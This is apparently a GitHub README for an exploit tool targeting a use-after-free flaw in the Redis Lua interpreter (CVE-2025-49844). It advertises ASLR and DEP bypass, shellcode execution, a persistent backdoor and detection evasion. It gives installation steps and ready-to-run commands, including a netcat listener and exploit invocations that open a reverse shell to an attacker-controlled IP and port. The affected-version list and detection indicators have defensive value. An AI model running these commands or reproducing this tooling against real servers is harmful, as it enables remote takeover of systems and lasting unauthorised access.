# CVE-2025-49844 - Redis Lua Interpreter UAF Exploit

![yuri08loveelaina](https://img.shields.io/badge/Author-yuri08loveelaina-red)
![Version](https://img.shields.io/badge/Version-2.0-blue)
![License](https://img.shields.io/badge/License-MIT-green)

## Features

- Exploit Use-After-Free (UAF) vulnerability in Redis Lua interpreter
- Bypass ASLR via memory information leakage
- Bypass DEP/NX using Return-Oriented Programming (ROP)
- Heap spraying for reliable exploitation
- Execute arbitrary shellcode on target systems
- Establish persistent backdoor access
- Multi-stage exploitation with memory manipulation

## Requirements

- Python 3.6+
- Redis server with vulnerable version
- Required Python packages:
```
pip install redis
```
## Installation

```
git clone https://github.com/Yuri08loveElaina/CVE-2025-49844.git
cd CVE-2025-49844
pip install -r requirements.txt
chmod +x redis-exploit.py
```
- Usage
Basic Vulnerability Check
```
python3 exploit.py -H <target_host> -p <port> [-a <password>]
```
Reverse Shell Establishment
# First, start a listener on your machine
```
nc -lvnp 4444
```
# Then, run the exploit with reverse shell parameters
```
python3 exploit.py -H <target_host> -p <port> [-a <password>] -l <your_ip> -P <your_port>
Options
-H, --host: Target Redis host (default: localhost)
-p, --port: Target Redis port (default: 6379)
-a, --auth: Redis password (if required)
-l, --lhost: Your IP address for reverse shell connection
-P, --lport: Your port for reverse shell connection (default: 4444)
```
Examples

# Basic exploitation
```
python3 exploit.py -H 192.168.1.100
```
# With authentication
```
python3 exploit.py -H 192.168.1.100 -p 6380 -a mypassword
```
# With reverse shell
```
python3 exploit.py -H 192.168.1.100 -l 10.10.15.5 -P 4444
```
# Exploit Stages
- Connection & Version Check: Establish connection to target and verify vulnerability
- Architecture Detection: Determine target architecture (x86/x64)
- Heap Preparation: Spray heap to increase exploit reliability
- UAF Object Creation: Create objects for Use-After-Free exploitation
- Memory Leakage: Leak memory addresses to bypass ASLR
- ROP Chain Construction: Build ROP chain to bypass DEP/NX
- Shellcode Execution: Execute arbitrary shellcode on target
- Persistence: Establish persistent backdoor if requested
## Vulnerable Versions
Redis 7.2.x before 7.2.11
Redis 7.4.x before 7.4.6
Redis 8.0.x before 8.0.4
Redis 8.2.x before 8.2.2
## Detection
The exploit attempts to minimize detection, but possible indicators include:

- Unusual Lua script execution patterns with large payloads
- Anomalous memory allocation behavior in Redis process
- Unexpected process creation from Redis parent process
- Network connections from Redis process to external hosts
Disclaimer
This tool is for educational and authorized security testing purposes only. The authors are not responsible for any misuse or damage caused by this tool. Use only on systems you own or have explicit permission to test.

License
This project is licensed under the MIT License - see the LICENSE file for details.